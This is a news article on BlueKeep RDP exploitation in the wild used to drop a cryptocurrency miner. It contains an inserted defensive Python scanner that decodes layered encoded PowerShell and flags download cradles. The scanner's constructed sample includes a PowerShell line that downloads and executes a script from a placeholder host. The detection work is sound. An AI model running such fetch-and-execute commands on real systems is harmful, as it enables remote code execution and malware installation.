Well, this is an unfortunate turn of events. Back in July, security researchers at Sophos created a proof-of-concept demonstration showing how easy it would be for an unpatched RDP (Remote Desktop Protocol) server to be compromised by BlueKeep, a wormable Windows bug. Fast forward to today, and it has been discovered that BlueKeep is actively being exploited in the wild.

BlueKeep is a dangerous remote code execution vulnerability, and it is no longer a theoretical threat. The evidence so far points to affected machines being used to mine cryptocurrency. There could be worse consequences for this type of bug, though hijacking a PC's resources for mining purposes is, at the very least, an annoyance.

Evidence of BlueKeep's exploitation in the wild came by way of Kevin Beaumont, a security researcher who noticed multiple honeypots in his EternalPot RDP network crashing and rebooting. This struck him as unusual because it was the first time this had happened in nearly a year and a half.

It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr — MalwareTech (@MalwareTechBlog) November 2, 2019

At first, Beaumont said there was no evidence that the crashes and reboots were related to an RDP exploit. However, he sent the logs over to MalwareTech, who dug through the crash dump and concluded that "the BlueKeep worm has finally arrived!"

The investigation uncovered "BlueKeep artifacts in memory and shellcode to drop a Monero miner." The shellcode appears to run an encoded PowerShell command that makes the infected system download a second PowerShell script, which is also encoded. The final payload is what looks like a cryptocurrency miner (25 antivirus engines on VirusTotal detect it as such).
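A defender looking at process-creation telemetry for this kind of chain wants to peel the encoding layers off the command line and see what the script actually does. The following is an added example, not code from the article or from MalwareTech's analysis: a small Python scanner that decodes the `-EncodedCommand` layer (base64 of UTF-16LE text), follows one nested `[Convert]::FromBase64String('...')` layer, and flags download cradles such as `DownloadString`. The log format (`time|image|command line`), the timestamps, the stage-two script and its `.invalid` placeholder URL are all constructed for the example.

```python
import base64
import re

# -EncodedCommand and its accepted short forms, followed by a base64 blob.
ENCODED_FLAG_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)
# A nested [Convert]::FromBase64String('...') literal inside an already decoded script.
NESTED_B64_RE = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.IGNORECASE
)
# Common PowerShell download primitives (the "download cradle" indicator).
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)


def _bytes_to_text(raw: bytes) -> str:
    """Decode as UTF-16LE when the buffer looks like ASCII text with NUL high bytes,
    which is how PowerShell expects -EncodedCommand; otherwise fall back to UTF-8."""
    if len(raw) >= 4 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def decode_layers(cmdline: str, max_depth: int = 4) -> list:
    """Return the successively decoded scripts, outermost first. Stops at the first
    layer that carries no further encoding, or when a blob fails strict base64 decoding."""
    layers = []
    text = cmdline
    for _ in range(max_depth):
        match = ENCODED_FLAG_RE.search(text) or NESTED_B64_RE.search(text)
        if not match:
            break
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:
            break
        text = _bytes_to_text(raw)
        layers.append(text)
    return layers


def classify(cmdline: str) -> dict:
    """Decode a command line and list the indicators found across all layers."""
    layers = decode_layers(cmdline)
    indicators = []
    if layers:
        indicators.append("encoded command")
    if len(layers) >= 2:
        indicators.append("nested encoding")
    if any(DOWNLOAD_RE.search(t) for t in [cmdline, *layers]):
        indicators.append("download cradle")
    return {"layers": layers, "indicators": indicators}


def scan_logs(lines) -> list:
    """Return (line number, classification) for every line with at least one indicator.
    Constructed log format: time|image|command line."""
    findings = []
    for number, line in enumerate(lines, 1):
        _time, _image, cmdline = line.split("|", 2)
        result = classify(cmdline.strip())
        if result["indicators"]:
            findings.append((number, result))
    return findings


def _ps_b64(script: str) -> str:
    """Base64 of UTF-16LE text, the form PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed two-stage sample mirroring the chain described in the article: an encoded
# outer command unwraps a second base64 layer whose script fetches a further stage.
# The URL is a placeholder on a reserved .invalid domain, not a real indicator.
_STAGE2 = "(New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/s.ps1') | IEX"
_OUTER = (
    "$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('%s'));IEX $s"
    % _ps_b64(_STAGE2)
)

# Constructed sample log lines: two benign administrative invocations and one encoded chain.
SAMPLE_LOGS = [
    "2019-11-02T10:15:01Z|powershell.exe|powershell.exe -NoProfile -Command Get-Service",
    "2019-11-02T10:15:07Z|powershell.exe|powershell.exe -ep bypass -File C:\\scripts\\backup.ps1",
    "2019-11-02T10:15:12Z|powershell.exe|powershell.exe -nop -w hidden -enc " + _ps_b64(_OUTER),
]

if __name__ == "__main__":
    for number, result in scan_logs(SAMPLE_LOGS):
        print(f"line {number}: {', '.join(result['indicators'])}")
        for depth, script in enumerate(result["layers"], 1):
            print(f"  layer {depth}: {script[:80]}")
```

The `-ep bypass` line is deliberately included because a naive match on `-e` would misfire on it; the `\b` after the switch name keeps `-ep` from being read as `-e`. In practice this logic runs over Sysmon event ID 1 or Windows 4688 command lines rather than a constructed pipe-delimited list, and an analyst would add the decoded layers to the alert so the stage-two URL is visible without re-running the decode by hand.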

It is not entirely clear whether the malware is an actual worm, though it does appear to exploit the BlueKeep bug. The good news is that it does not self-propagate; instead, the culprit is likely working from a list of IP addresses. According to a previous Microsoft advisory, the vulnerability affects multiple versions of Windows 7, Windows Server 2008, and Windows Server 2008 R2.

The ability to self-propagate (what makes it wormable) is what makes BlueKeep particularly worrisome, because related malware could quickly spread across a network. Microsoft has already issued a patch, and businesses are strongly advised to make sure their systems are updated.